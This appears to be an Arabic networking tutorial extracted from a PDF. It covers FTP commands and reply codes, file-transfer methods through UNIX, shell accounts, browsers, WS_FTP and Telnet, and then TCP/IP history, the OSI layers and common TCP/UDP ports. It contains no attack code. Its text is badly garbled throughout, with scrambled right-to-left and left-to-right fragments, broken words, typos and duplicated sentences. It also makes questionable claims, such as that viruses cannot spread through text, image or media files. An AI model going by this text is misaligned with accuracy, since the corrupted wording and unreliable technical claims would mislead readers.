ما ھو بروتوكول نقل الملفات ؟=-= -=-= -=-= -=-=-= -=-= -=-= -=-

file transfer protocol= ftp بروتوكول نقل الملفات ھو عباره عن مجموعة من من القواعد التي تملي كیفیة

ip/tcpنقل الملفات على بروتوكوالت

يتكون االتصال من مزود و زبون حیث يقوم الزبون بالحصول على ملف عن طريق 21فتح اتصال مع المزود ، و غالبا يعمل المزود ھنا عن طريق المنفذ رقم

!مالحظة

=-= -=-= -=-= -=-=-= -=-= -=-= -=-=-= -=-= -=-= -=-=-= -=-= -=-= -=-=-

منفذ آخر إلى أي21يمكن أن يغیر مدير النظام رقم المنفذ من =-= -=-= -=-= -=-=-= -=-= -=-= -=-=-= -=-= -=-= -=-=-= -=-= -=-= -=-=-

و عندما يتم االتصال بین المزود و الزبون يقوم المزود بإرسال عبارة ترحیبیة للزبون و غالبا تكون بمثل ھذا الشكل:

220 Please login. s FTP server'SpiderMan !

completion codeھناك رقم في بداية العبارة و ھو ما كما الحظت يوجد يسمى

الرمز األكمالي و في العبارة الترحیبیة يكون الرمز اإلكمالي واحد من اثنین و ھما

220إذا قبل المزود اإلتصال 421إذا رفض المزود اإلتصال

بعد أن يقوم المزود بإرسال العبارة الترحیبیة يقوم الزبون بإرسال طلب

28

يكون ھذا الطلب عبارة عن كلمة معینه و بعض الكلمات إلى المزود ، و تحتاج إلى إضافة قیمة لھا و ھذا الجدول يحتوي على الكلمات التي يكثر

استخدامھا

الطلب الوظیفة

CWD تغییر المجلد الحالى في الملقم PWD كتابة الموجود في المجلد الحالي على الشاشة

CDUP إلى المجلد الذي يحتويه للخروج من المجلد الحالى MKD إلنشاء مجلد على الملقم RMD إلزالة مجلد من على الملقم DELE إلزالة ملف من على الملقم USER إلرسال اسم المستخدم في عملیة الدخول PASS إلرسال كلمة السر في عملیة الدخول ABOR للتوقف عن النقل QUIT إلغالق إلتصال STATالة على الملقم للحصول على الح RETR لطلب الحصول على ملف من الملقم STOR إلرسال ملف من جھاز الزبون إلى الملقم SYST للحصول على معلومات عن نظام التشغیل على الملقم HELP للحصول على مساعدة عن أحد الطلبات

بعد إرسال الطلب يجب على الزبون أن ينتظر حتي يتلقى الرد من المزود قبل

أن يقوم بإرسال طلب آخرإال إذا قام بإرسال طلب إغالق لإلتصال فلن يكون علیه اإلنتظار حتى يتلقى الرد

من المزود بالنسبة لألمر السابق

بعد أن يتم اإلتصال و يقوم المزود بإرسال العبارة الترحیبیة يجب على الزبون أن يقوم بإرسال إسم

إلى ملقم الخدمة المستخدم و كلمة السر لیقوم بالدخول

بعد أن يقوم الزبون بإرسال طلبة يقوم المزود بإرسال الرد علیه و ھو يتكون من رمز إكمالي متبوعا بسطر أو أكثر

29

فیكون ھناك خطأ 0و عموما فعندما يكون الرقم الثاني من الرمز اإلكمال ھو كتابي في الطلب الذي أرسله الزبون

. فعندھا تكون إما عبارة ترحیب أو توديع 2 و عندما يكون الرقم الثاني

30

?FTPماھو نقل الملفات

FTP ھي اختصار لكلمة File Transfer Protocol ،وتعني بروتوكول نقل الملفات التي تجعل من الممكن نقل IP/TCPوھذه الخدمة ھي احدى تسھیالت

نھا تقوم الرائعة أFTPالملفات بین الكمبیوترات على الشبكة ومن میزات بترجمة شكل الملفات النصیة بطريقة أتوماتیكیة حیث أن الكمبیوترات تحتوي

مختلفة للملفات النصیة Formatsنظم تشغیل مختلفة وعلیه فلديھا أشكال وبخدمة نقل الملفات فاننا نحتاج , FTPفبالتالي تحتاج لترجمة وھو ماتقوم به

. میركا الى جھازنالبضع نقرات على الفأرة كي ننقل ملفا في أ

:أقسام نقل الملفات

:نقل الملفات ينقسم الى قسمین

:Downloadتنزيل الملفات •

.Local الى الجھاز المحلي Hostوھو جلب الملفات من الكمبیوتر المضیف

:Uplaodارسال الملفات •

.Host الى الكمبیوتر المضیف Localوھو ارسال الملفات من الكمبیوتر المحلي

:ناحیة األمنیة فھناك نوعان لنقل الملفاتومن ال

:Secure FTPنقل مؤمن •

تحتاج الى اسم مستخدم وكلمة مرور للدخول الى النظام وتحصل علیه من .مدير النظام المضیف

:Anonymous FTPنقل مجھول •

التحتاج الى اسم مستخدم وكلمة مرور للدخول وتستطیع غالبا استخدام guest أو anonymousا عنھما عوض.

:تصنف مصادر البرامج على االنترنت الى ثالثة أقسام

31

:Public Domainملكیة عامة •

وضعت البرامج ھنا لالستخدام العام فلیس ھناك حقوق ملكیة ألحد وال قیود .على استخدامھا وتوزيعھا وتعديلھا

:Freewareمصادر مجانیة •

ھناك حقوق ملكیة ونشر يحق للجمیع استخدام ھذه البرامج أو توزيعھا ولكن .وال يجوز تعديلھا أو بیعھا

:Sharewareمصادر مشتركة •

يتم توزيع ھذه البرامج بغرض التجربة قبل الشراء وقد التتضمن جمیع الممیزات .ويجب تحطیم النسخ بعد انتھاء مدتھا

FTPوالفیروسات :

يجب أن تعلم في البداية أن الملفات والبرامج تنقسم الى قسمین

SCIIA:

) American Standard Code for Information Interchange(اختصارا لـ تتراوح قیمتھا بین bitsوالملفات من ھذا النوع تحتوي على سبعة جزيئات

ويستخدم ھذا المصطلح للتعبیر عن المعیار الذي يقوم بتحويل . 127الصفر و صیة ھذا النوع من وتستخدم الملفات الن. األحرف الى أرقام في الكمبیوتر

.الصیغ

Binary:

تتراوح بین bitsوتعني الملفات ذات النظام الثنائي وتحتوي على ثمانیة جزيئات . وتندرج الصور والبرامج والملفات المضغوطة تحت ھذا النوع255الصفر و

كما اليمكن أن تنتقل عبر ASCIIوالفیروسات ال يمكن أن تنتقل عبر ملفات وغیرھا من امتدادات الصور وال عبر ملفات jpg &gif & bmpالصور كصیغ

وغیرھا، وبمعنى آخر فانھا ram-avi - wav-3 mp-mpg الفیديو والصوت مثل : تنتقل عبر البرامج وملفات النظام والتشغیل والبرامج المضغوطة وعادة ماتكون

32

bin- sys - drv - dll - bat - com -exe - 64 b- xxe -uue - mim - zip -ovl bhx- كما يمكن أن تنتقل فیروسات الماكرو عبر تطبیقات ،MS Office لذلك ،

.احذر من ھذه الملفات وافحصھا دائما قبل تشغیلھا

:FTPطريقة نقل الملفات

:ھناك طرق عديدة لنقل الملفات وھي

UNIXنقل الملفات باستخدام نظام •

:UNIX وھاھنا بعض أوامر تتطلب ھذه العملیة عادة استخدام أوامر

ascii : لنقل ملفاتASCII النصیة، وعند تغییر ھذا الوضع ثم الحاجة لنقل ملفات .من ھذا النوع فیجب اعادة األمر

binary : لنقل الملفات الثنائیة، وعند تغییر ھذا الوضع ثم الحاجة لنقل ملفات .من ھذا النوع فیجب اعادة األمر

status :فة ھل ھو من نوع لفحص الملف ومعرASCII أو Binary.

help : لعرض قائمة بأوامرUNIX.

dir : عرض محتويات الدلیل

ls :عرض محتويات الدلیل الحالي.

cd directory :تغییر الدلیل.

get filename :جلب الملف المطلوب وانزاله على جھازك.

mget filename:جلب مجموعة من الملفات.

pwd :اليطباعة الدلیل الح.

bye :انھاء االرتباط والخروج من النظام البعید.

:Shellنقل الملفات باستخدام حساب •

33

أول ماتفعله في ھذا النوع من نقل الملفات ھو ادخال الملقن الخاص بشركة ، Unix Shell عن طريق Tripodتوفیر الخدمة فمثال سوف تدخل حسابك في

ثم com.tripod.ftp ftp: مرادة فیصبح متبوعا بالوجھة الftpنكتب أوال األمر ، ثم نقوم بادخال الرقم "IronPrivate"ندخل االسم وھو عل سبیل المثال

وبعد الدخول الى الحساب يمكنك استخدام نفس "******". السري وھو مثال . المعتادةUnixأوامر

:Browserنقل الملفات باستخدام المتصفح •

سھل جدا فما علیك سوى ادخال عنوان نقل الملفات عن طريق المتصفحات http//: ثم العنوان بدال من كلمة ftp//: ويبدأ العنوان بكلمة URLالموقع

ستأتي الصفحة عبارة عن ملفات FTPللعناوين العادية، بعد الدخول الى موقع الـ .ومجلدات وماعلیك سوى النقر على الملف المطلوب النزاله

:PPP/SLIPب نقل الملفات باستخدام حسا •

أفضل استخدامات ھذا النوع من الربط أنھا تسمح لنا باستخدام برامج تابعة Client Programs . وأفضل برنامج تابع يمكن استخدامه للنوافذWindows ھو

.ftp_Wsبرنامج

:ftp LE_Ws 5.06 استخدام برنامج -

ادخل على البرنامج وذلك بالنقر المزدوج على أيقونة البرنامج، سیظھر لك مربع والذي من خالله تقوم بتسجیل الدخول، اكتب في خانة Session Profileحوار

Profile Nameلمثال اسم حساب الدخول؛ على سبیل اMy Home Page In Tripod واكتب في خانة Host Name اسم الملقن وفي ھذا المثال ھو

com.tripod.ftp ثم في خانة Host Type اختر Auto Detect لكي يقوم بالتدقیق التلقائي في نوع نظام الجھاز المضیف، بعد ذلك قم بكتابة االسم في

Passwordرقم السري في خانة ثم الIronPrivate وھو مثال User IDخانة كما في الشكل . OKثم اضغط , ******وسیظھر مخفیا على ھیئة نجوم

:التالي

34

بعد ذلك سیقوم البرنامج بالدخول الى الحساب المطلوب وستنقسم نافذة ؛ القسم األيسر ھو جھاز الكمبیوتر لديك والقسم األيمن البرنامج الى قسمین

ھو جھاز الكمبیوتر المضیف، في ھذه المرحلة تستطیع جلب أو ارسال الملفات أي تستطیع التحكم في محتويات حسابك . الخ... أو تغییر اسمائھا أو حذفھا

.على االنترنت أو على جھازك بسھولة فائقة

:Telnetال الشبكي البعید نقل الملفات باستخدام االتص •

Telnet ھي بروتوكول انترنت معیاري لخدمات الربط عن بعد ويسمح للمستخدم بربط جھازه على كمبیوتر مضیف جاعال جھازه وكأنه جزء من ذلك

اذا كان الجھاز . ويختلف العرض حسب نظام الكمبیوتر المضیف. الكمبیوتر البعیدشكلة أما اذا كان يستخدم نظام آخر فال مWindowsالبعید يستخدم نظام

والذي يحضر " ؟"فیجب معرفة بعض األوامر للتحكم وأھم أمر يجب أن تعرفه ھو .لك قائمة باألوامر الالزمة

:Windows من Telnet استخدام برنامج -

يمكنك الدخول علیه بالضغط Telnet برنامجا سھال يسمى Windowsترفق وستنفتح لك صفحة Telnet ثم اكتب Runشغیل ثم تStartعلى قائمة ابدأ

في صندوق الحوار . Remote System اختر Connectمن .. البدء للبرنامجConnect الذي سیظھر لك اكتب في خانة Host Name اسم ملقن الجھاز

او اتركه كما ) اذا كان لديك( المیناء أو المنفذ Portالمضیف ثم اكتب في خانة بعد ذلك اضغط . ، ان كان لديك واال قم بالتجربةTerm Typeلـھو، ثم اختر من ا

35

Connectوبعد . وعندما يتم الربط فستحتاج الدخال االسم والرقم السري .Exit وبعد ذلك اختر Connect من قائمة Disconnectاالنتھاء من النقل اختر

36

Idiots4 IP /TCPالجزء األول

jAcKAl.SaD:للكاتب

Idiots4 IP /TCP== ==الجزء االول

=المقدمة = من الناحیة العلمیة مجموعة من الوسائل التي تمكن الحواسیب IP/TCPيمثل

المشبكة من االتصال فیما بینھا ، بصرف النظر عما اذا كانت تنتمي الي الشبكة ذاتھا او ل إلي شبكات منفصلة ، وما اذا كانت من نوع واحد او من انواع مختلفة ، ويمث

IP/TCP مجموعة من المعايیر القیاسیة، المستقلة عن منصات العتاد التي يؤمن االتصال فیما بینھا، وھو يجسر الفجوة بین الحواسیب ونظم التشغیل

كذلك البروتوكول الذي يحرك شبكة االنترنت IP/TCPوالشبكات المختلفة، و تقوم ... عة العالمة التي يعود الیھاا الفضل األساسي في شھرته الواس

وتبديل الرزم ... تبديل الرزم Packet Switching علي تقنیة IP/TCPبروتوكوالت منفصلة وحیدة الھوية التي تشكل بعد Packetتعني تقسیم البیانات الي رزم

.. جمعھا البیانات كلیا

=IP/TCPنظرة علي = وير تقنیة بتطARPAفي السبعینیات قامت وكالة مشروع األبحاث المتطورة

بروتوكول التحكم في Network Control Protocol NCPتبديل الرزم وتم ربطھا بـ ..الشبكة اقرا (RFC بروتوكول التحكم في النقل نشرت بعد في وثائق TCPولم تكن

1981اال سنة ) ... وھي وثائق تشرح وتحدد قیاسیات انترنت RFCالشرح حول ) ... 791 و 793راجع الوثیقة رقم (

نتیجة ألبحاث مولتھا وكالة مشروع األبحاث المتطورة IP/TCPوطور بروتوكول ARPA التابعة للحكومة األمريكیة في مطلع السبعینیات ، وبفضل بروتوكول

37

IP/TCP أضبح بإمكان شبكات البحوث العلمیة حول العالم أن تتصل، لتشكل ، وتعتبر ھذه net WorkInterفیما بینھا شبكة افتراضیة يشار إلیھا باسم

الشبكة االفتراضیة النموذج االول لشبكة انترنمت بعد أن تحول الخلیط الذي إلي العمل وفقا لبروتوكول Arpanetكان قائما من الشبكات والذي عرف باسم

IP/TCP وأصبحت الشبكة الناتجة العمود الفقري لشبكة إنترنت التي نعرفھا ، .الیوم

= IP/TCPأساسیات =

Internet /Transmission Control Protocol العبارة IP/TCPيمثل االختصار Protocol ويعرف البروتوكول في . بروتوكول انترنت / أي بروتوكول التحكم بالنقل

مصطلحات الشبكات بأنه طريقة قیاسیة متفق علیھا ، تتیح لحاسوبین تبادل تربو علي المائة ، ولذلك كثیرا ما من بروتوكوالت عديدة IP/TCPالبیانات، ويتألف

البروتوكولین IP و TCP ، حیث يشكل IP/TCPيشار الیھا بعبارة مجموعة .األساسین في المجموعة

التي تركبھا علي حاسوبك، تجسیدا محددا لھذا IP/TCPتمثل برمجیات البروتوكول مالئما خصیصا لمنصة العتاد التي تستخدمھا، وتتضمن ھذه

بروتوكول نقل ( FTPعادة برامج تطبیقیة عالیة المستوي مثل البرمجیات والذي يسمح للمستخدمین بإنجاز نقل الملفات عبر الشبكة، من ) الملفات

..خالل سطر األوامر المستخدم لنظام التشغیل المستخدم في أجھزتھم

======البروتوكول =====

Protocol بروتوكول

أجھزة الكمبیوتر المتصلة عبر الشبكة، بھدف تبادل ھو اللغة التي تتخاطب بھاوإذا أردنا تعريف البروتوكول بلغة تقنیة، نقول أنه وصف رسمي . المعلومات

لھیئات الرسائل والقواعد التي يجب على كمبیوترين اتباعھا لتبادل تلك تستطیع البروتوكول وصف تفاصیل البنیة التحتیة للواجھة البینیة بین . الرسائل

تستطیع البروتوكوالت وصف تفاصیل . كمبیوترين اتباعھا لتبادل تلك الرسائلمثل ترتیب البتات والبايتات ( البنیة التحتیة للواجھة البینیة بین كمبیوترين

وتستطیع أيضا، وصف عملیات التبادل التي تجري بین ). المرسلة عبر األسالك ريقة التي يتبادل بھا برنامجان، مثل الط( البرامج على مستوى البنیة الفوقیة

) الملفات عبر إنترنت

38

===

مھما للغاية ھذه األيام ھو أنه يسمح IP/TCPالسبب الذي يجعل من للشبكات المستقلة باالتصال مع إنترنت، أو االتصال مع بعضھا لشتكل شبكات

ي إنترانت خاصة، تتصل الشبكات المكونة إلنترانت فیزيئیا بواسطة أجھزة تسموالموجه ھو حاسوب قوم بنقل رزم من . IP أو موجھات Routerالموجھات

.البیانات من حاسوب آلخر في IP/TCPتنتقل المعلومات ضمن شبكة إنترانت العاملة وفق بروتوكول

IP (IPأو جزئیات بیانات ) IP PACKET(IPوحدات منفصلة تسمي رزم Datagrams(

بین أي حاسوبین متصلین الي شبكة تعمل االتصال IP/TCPوتؤمن برمجیات عملیا الموجھات ومعمارية IP/TCPويخفي بروتوكول . وفقا لھذا البروتوكول

وكما أن الصلة إلي شبكة . الشبكة ويجعل كل شيء يبدو كشبكة كبیرة واحدة Ethernet تعرف بواسطة ھوية Ethernt ID بت، وكذلك فإن الوصل 48 بطول

IPواسطة عنوان إلي انترانت يعرف ب بت، ويعبر عن ھذا العنوان بواسطة أعداد عشرؤية منقطة مثل 32بطول

128.2.3.44 لحاسوب بعید يممكن لحاسوب مرتبط إلي إنترانت او IPوعند إسناذ عنوان

إنترنت أن يرسل البیانات إلي ذلك الكمبیوتر تماما كما لو أن الحاسوبین بین جزء ...ا من الشبكة الفیزيائیة نفسھ

حال لمسئلة إمكانیة تبادل البیانات بین حاسوبین متصلین إلي IP/TCPيقدم

االنترانت ذاته ، ولكنھا ينتمیان إلي شبكات فیزيائیة مختلفة، وياتي حل ھذه نصیبه في IP/TCPالمسئلة في أجزاء متعددة بحیث يؤدي كل عضو من عائلة

حل جزء من المسئلة عبر IP رزم بیانات IP/TCPبروتوكول األھم في طاقم وھو الIPيرسل بروتوكول

أي Routingاالنترانت، ويتطلب ذلك القیام بعملیة ھامة للغاية تسمي التوجیه .B إلي Aاختیار الممر الذي ستسلكه رزم البیانات عبر الشبكة للوصول من

بروتوكول المستوي األعلي الذي يسمح لتطبیقات منفذة علي TCPويمثل من البیانات ، ويقسم Streamsیب مضیفة مختلفة بتبادل تیارات حواس

ويقوم TCP Segments تیارات البیانات إلي كتل تسمي مقاطع TCPبروتوكول .IPبنقل ھذه المقاطع مستخدما بروتوكول

وحیدة، ولكن IP بواسطة رزمة البیانات TCPوفي معظم الحال ترسل كل قطعة ، IP بتقسیم المقطع إلي عدة رزم بیانات TCPل عند الضرورة يقوم بروتوكو

39

بحیث تصبح متوافقة مع إطارات البیانات الفیزيائیة التي تحمل البینات والبايتات ال يضمن وصول رزم IPبما أن بروتوكول , بین الحاوسیب المضیفة علي الشبكة

TCPع بتجیمع مقاطTCPالبیانات بالترتیب ذاته الذي ارسل به، يقوم بروتوكول telnet و FTPفي الطرف اآلخر لیشكل منھا تیار بیانات متصال، يعتبر كل من

عضوا UDP ويمثل بروتوكول TCP المعتمدة علي IP/TCPمثاال مألوفا لتطبیقات وھو بروتوكول رزم بیانات المستخدم، وھو IP/TCPآخر مھما في مجموعة

بروتوكوالت موثوقا ألنه يقوم PTC لكنه أكثر بدائیة، يعتبر TCPمشابه لبروتوكول وإجراءات المصافحة Error Checkingبالتحري عن االخطاء المحتملة

handshaking الالزمة للتأكد من ان البیانات تصل سلیمة إلي ھدفھا .. موثوقا ألنه ال يضمن وصول رزم البیانات بالترتیب الذي UPDوال يعتبر بروتوكول

وصولھا، وإذا كانت الموثوقیة مطلوبة فإن أرسلت به أو يضمن حتي مجرد UDPومع ذلك يبقي لبروتوكول . تحقیقھا يقع علي عاتق التطبیق المعني

ويعد . وثمة عدد من التطبیقات التي تستخدمه IP/TCPمكانه في عالم أحد IP/TCP المتوفر مع معظم أدوات SNMPبروتوكول إدارة الشبكة البسیطة

PUDتطبیقاتا بروتوكول

تلعب بروتوكوالت أخري أدوارا ھا أقل بروزا لكنھا ال تقل أھمیة عن غیرھا في إلي IP عنوان ARPفمثال يترجم حل شیفرة العنوان . IP/TCPتشغیل شبكات

عنوان شبكة فیزيائي ، مثل عناوين إيثرنت، وھناك بروتوكول حل شیرة العنوان ه يحول العنوان الفیزيائي وھو يؤدي الوظیفة المعاكسة أي أنRARPالعكسي

فھو بروتوكول داعم ICMPأما بروتوكول رسائل التحكم بإنترنت . IPإلي عنوان إليصال معلومات التحكم، وتلك المتعلقة بحصول خطأ أثناء نقل رزم IPيستخدم

IP إذا لم يكن الموجه قادرا مثال علي إرسال رزم بیانات ، IP يقوم باستعمال ICMPسل بوجود مشكلة إلعالم المر.

: تنقسم البروتوكوالت بشكل عام الى قسمین

1- Oriented-Connection . 2- Connectionless .

بإعداد اتصال مباشر Oriented-Connectionيقوم البروتوكول من النوع األول بین األجھزة المتصلة في Virtual Circuitيسمى دائرة ظاھرية أو افتراضیة

. الشبكةقق ھذا اإلتصال المباشر موثوقیة عالیة لتسلیم البیانات و لكنه قد يؤدي و يح

. الى بطئ في عمل و أداء الشبكة

40

مثاال واضحا على ) TCP(Transmission Control Protocolيعتبر بروتوكول . Oriented-Connectionالبروتوكوالت محددة وجھة اإلتصال فإنھا ال توفر اتصاال مباشرا nnectionlessCoبینما البروتوكوالت من النوع الثاني

مع الكمبیوتر المستقبل قبل إرسال البیانات، مما يعني أن البیانات تنتقل بسرعة أكبر مما يحسن من أداء الشبكة، و لكن ھذه الطريقة لیست تامة

الموثوقیة نظرا ألنه ال سبیل لمعرفة فیما إذا حدثت أخطاء أثناء اإلرسال أم لم . تحدث

مثاال واضحا على البروتوكوالت عديمة اإلتصال UDPيعتبر بروتوكول Connectionless.

=OSI/ISO و IP/TCPمعمارية الطبقات=

عند مناقشة معماريات الشبكة، غالبا ما يستخدم مصمموا الشبكات نموذج OSI/ISO

Open Systemوصل االنظمة المفتوحة / منظمة المقايیس العالمیة nnectionInterco ذا الطبقات السبع، حیث تمثل كل طبقة في النموذج

Physical Layerمستوي من فعالیات الشبكة، ونجد في القعر الطبقة الفیزيائیة والتي تمثل الوسط الفیزيائي الذي تنتقل المعلومات من خالله أي كابالت

ayerLink L-Dataالتشبیك، وتتوضع فوق تلك الطبقة طبقة توصیل البیانات والتي توفر خدماتھا بواسطة بطاقات الشبكة، الطبقة األعلي ھي طبقة

التي تنفذ فیھا برامج التطبیقات العاملة في بیئة Application Layerالتطبیقات .الشبكة

العملیة الكاملة لنقل البیانات على الشبكة تمر بمجموعة من الخطوات، و في

مكن تنفیذھا في خظوة أخرى، و لكل كل خطوة معینة تنفذ مھام محددة ال يخطوة بروتوكول محدد أو مجموعة بروتوكوالت في طبقة محددة تحدد كیفیة

تنفیذ المھام المتعلقة بھذه الخطوة، كما أن ھذه الخطوات تكون متشابھة لكل جھاز على الشبكة، كما يجب مالحظة أن الجھاز المرسل يقوم باتباع ھذه

ألسفل بینما يقوم الجھاز المستقبل باتباع ھذه الخطوات من األعلى الى ا ..الخطوات بشكل معكوس من األسفل الى األعلى

OSI/ISO مع نموذج IP/TCPيوضح الشكل الرسمي مخطط

jpg.tcp/sadjackal/com.freewebz.www://http

41

ويظھر العالقة بین نواة IP/TCPويوضح الشكل كذلك البنیة الطبقیة لبروتوكول عند نزول مطقع بیانات من شبكة التطبیقات إلي بطاقة . وكولین البروت

المتتالیة ويتم رزمھا بالمعلومات IP/TCPالتشبیك، فإنھا تنتقل عبر واحدات المناظرة في الطرف اآلخر، في كل خطوة من IP/TCPالتي تتطلبھا وحدة

Frameالمسار وتكون عند وصول البیانات إلي بطاقة التشبیك وعلي شكل إطار ايثرنت قیاسي

في الجھة المستقبلة بإعادة تشكیل البیانات االصلیة IP/TCPوتقوم برمجیات ، IP/TCPللتطبیق المستقبل وذلك بالتقاط أطر ايثرنت وتمريرھا عبر مكدس

Sniffer من الداخل باستخدام برامج من نوع IP/TCPوتتمثل أفضل الطرق لفھم ومالحظة . طارات التي تجول حول الشبكة للنظر داخل اإل) مقتفي األثر (

. المتعددة IP/TCPالمعلومات المضافة من قبل وحدات

في العالم الحقیقي للشبكات لننظر إلي ما IP/TCPلتصوير الدور الذي يلعبه الذي يستخدم بروتوكول نقل النص Webيحدث عند قیام برنامج تصفح الشبكى

Web من مزود شبكة HTMLانات بھیئة باسترجاع صفحة البیHTTPالمتشعب .في انترنت

يستخدم مصفح الشبكة تجريدا برمجیا عالي المستوي، يسمي المقبس Socket لتشكل وصلة افتراضیة إلي المزود والسترجاع صحفة Web يرسل

إحضار إلي المزود ، وذلك بكتابة االمر HTTP بلغة GETالمتصفح الشبكة امر إلرسال TCPجیات المقبس بدورھا باستخدام بروتوكول الي المقبس فتقوم برم

البیانات ويمرر TCP ويقسم Web إلي مزود GETالبتات والبايتات المشكلة المر التي ترسلھا بدورھا علي شكل رزم بیانات إلي IPالمقاطع المنفردة إلي وحدة

( فة إذا كان متصفح الشبكة والمزود متصلین بشبكات فیزيائیة مختلWebمزود فعندھا تذھب رزم البیانات من شبكة إلي أخري ، إلي ) كما ھي الحال عادة

حین وصولھا إلي الشبكة التي يتصل بھا المزود فیزيائیا وتسلم رزم البیانات الذي Webبالنتیجة إلي المستقبل ويعاد تشكیلھا بحیث تدور بالنسبة لمزود

لمقبس كتیار مستمر من البیانات يقرأ كتل البیانات بتنفیذ عملیة القراءة من اويبدو ظھور البیانات المكتوبة الي المقبس في احدي النھايات، عند النھاية

األخري بالنسبة للمزود ولمتصفح الشبكة، وكأنه يتم بفعل سحري، لكن في األعماق تحثل كل أصناف التفاعالت المعقدة،، لخلق االنطباع بحصول تدفق

.ة متصل للبیانات عبر الشبك ھو تحويل عدد كبیر من الشبكات الصغیرة إلي شبكة TCPومجمل ما يقوم به

كبیرة وتقديم كافة الخدمات والتطبیقات الالزمة لالتصال بین ھذه الشبكات ، .عبر شركة إنترنت الناتجة عن ھذا الوصل

42

=OSI/ISO نموذج = ة تتوضع في في الحقیقة تحتوي علي بروتوكوالت عدIP/TCPوبروتوكوالت

ھي مجموعة من البروتوكوالت Stack( Protocol Stackنموذج مكدس المتكاملة في عملھا معا، و كل طبقة في ھذه المجموعة تحتوي على

)بروتوكول مختلف يقوم بوظیفة مختلفة يجب أن ينظم عمل البروتوكوالت المختلفة حتى ال Layersعلي شكل طبقات

. عملھايحدث أي تعارض أو نقص في Layeringيطلق على تنظیم المھام بین البروتوكوالت المختلفة اسم

على الطريقة التي يتم بھا ربط البروتوكوالت و ترتیبھا Bindingويطلق مصطلح .Protocol Stackمعا لتكوين

Application التطبیقات - الطبقة السابعة

Representation التمثیل –الطبقة السادسة Session الجلسة –الخامسة الطبقة

Transport النقل –الطبقة الرابعة Networkالطبقة الثالثة الشبكة

MACتحتوي علي طبقتین فرعییتن ( Data Link وصل البیانات -الطبقةا لثانیة )LLCو

Physical الطبقة الفیزيائیة -الطبقة االولي

كیف يعمل الطبقات ؟ مسئولة عن وظیفة معینة او مجموعة وظائف SIOكل طبقة من طبقات مكدس

عادة تدار من قبل ) طبقة التطبیقات حتي الجلسة ( الطبقة الثالث األعلي. طبقات 4اما باقي . التطبیق نفسھا، وبذلك المستخدم لديه بعضا من التحكم

.عادة تدار من قبل الحاسوب نفسھا الطبقات السفلي ، من الصعب جدا اكتشاف مالذي يفعله المكدس من في

ولكن ھناك منطقة داكنة بین الطبقات العلیا والسفلي ولكن كل طبقة تؤثر في ..غیرھا

....

43

تبادل البیانات

معلومات .. تبادل للمعلومات فیما بین الطبقاتOSIيحدث في كل طبقات نموذج بقة عن الطبقة الحالیة تضاف إلي ترويسة أو ذيل الرزمة قبل تسلیمھا الي الط

التالیة، ....والطبقة التالیة بدورھا تضیف معلومات بنفس الشكل ھكذا دوالیك

، والطبقة الوحیدة Encapsulationواضافة معلومات الي الرزمة تسمي تغلیف عندما . التي ال تقوم بإضافة معلومات إلي الرزمة ھي الطبقة الفیزيائیة

معلومات كل طبقة في نفس يستقبل الجھاز المرسل الیه رزمة، تقوم بجرد طبقة الجلسة تقوم بجرد معلومات المضافة من قبل طبقة الجلسة ( الطبقة

حتي تصل إلي طبقة ... وتمرر الباقي الي الطبقة التالیة ) في الجھاز المرسل بدون المعلومات ( التمثیل والطبقة تمرر الرزمة علي شكل البیانات االصلیة

) ....الترويسیة

تطبیقات طبقة الطبقة التطبیقات الطبقة الوحیدة التي يتفاعل معھا المستخدم ، وھي تقدم

طبقة التبیطقات يمكنھا فحص الموارد . الخدمات مباشرة إلي التطبیقات العاملة IP/TCPوتطبیقات .. المتبقیة، تزامن االتصال، وتعريف اطراف االتصال

.. FTP ،Telnet ،SMTP ، 3POP.. في ھذه الطبقة

..طبقة التمثیل وھي تھتم .طبقة التمثیل الطبقة الوحیدة التي يمكنھا تغییر البیانات في الرزمة

بتفاصیل التشفیر والتحويل والتأكد من أن البیانات المرسلة إلي الطرف اآلخر وانواع البیانات في ھذه الطبقة .. صالح للتعامل والقراءة في الطرف اآلخر

..3MP,MPEG,DOC,TIFF,GIFF,JPEGتشمل ...عملیة ضغط وتشفیر البیانات قبل ارسال الرزمة تتم في ھذه الطبقة

...طبقةالجلسة ھذه الطبقة تتولي انشاء االتصال وقطعھا بین طبقة التمثیل

والخدمات التي تقوم بالطلبیات واالجابة علي الطلبیات تتم ادارتھا بواسطة طبقة وھي تشمل بروتوكول معلومات المطقة البروتوكوالت الموجودة في ھذه ال

Zone ZIP/Information Protocol , بروتوكول التحكم في الجلسةSession SCP/Control Protocol و خدمة AppleTalk التي تدير خدمة ربط األسماء ...

44

:طبقة النقل

...طبقة النقل مسئولة عن توفیر نقل موثوق للمعلومات عبر الشبكات : ب موثوقیة االتصاالت بطرق اآلتیة وھي تكس

وذلك حتي تكون سرعة ارسال : dataflow control التحكم في التدقف - 1 .....البیانات من المرسل اسرع من سرعة معالجة المستقبل لھا

،، لتمكین البیانات القادمة من تطبیقات مختلفة ان Multiplexing المزج – 2 .تتوضع في وصلة وحیدة

بین المضیفات المتصلة، حیث يتم Virtual Cuirctشاء دوائر ظاھرية ان- 3 ..انشاءھا وفصلھا من قبل ھذه الطبقة

..من أجل االخطاء الواقعة أثناء النقل Error checkingفحص األخطاء : 4 ...طلب ارسال البیانات التالفة : 5

بقة ھي والقابعة في ھذه الطIP/TCPوالبروتوكول األساسي في مجموعة التي تعتبر من بروتوكوالت UDP و TCPوالفرق بین ... نفسھا TCPبروتوكول

TCPولذلك تعتبر .... ھذه الطبقة، الفرق بینھما فخص األخطاء وتصحیحھا ... فبروتوكول غیر موثوقUDPبروتوكوال موثوقا، اما

Port)2^16( منفذ 65,536يمكنه التعامل مع ) حاسوب ( منطقیا كل مضیف

وكل منفذ يمكن الوصول الیه من قبل برنامج واحد في . UDPو TCPمن أجل ، واذا كان المنفذ 23 رقم TCP يعمل مع منفذ telnetفمثال مزود . وقت واحد

وبعض المنافذ . فال يستطیع استخدامھا برامج اخري Telnetمشغول من طرف الذي يستعمله 53من الممكن أن تكون مستعمال ألكثر من برامج مثل منفذ

، يراقب منفذ معیا من اجل Back Orifice وحصان طروادة الشھیرة DNSمزود PcAnyWhereوالبرامج مثل . وصول البیانات او طلب التعامل من جھات اخري

.يعمل في ھذا النمط من الممكن ربطه بمنفذ آخر Telnetولكن اذا أراد م دير الشبكة قید استخدام

. 23یاسي غیر المنفذ الق

45

بعض المنافذ العامة TCPمنافذ

21 - FTP 23 - Telnet 25 - SMTP 53 - DNS

UDPمنافذ 53 - DNS 69 - TFTP

161 - SNMP 520 - RIP

Network Layerطبقة الشبكات ...طبقة الشبكات يسمح بدمج وصالت معلومات متعددة في وصلة واحدة

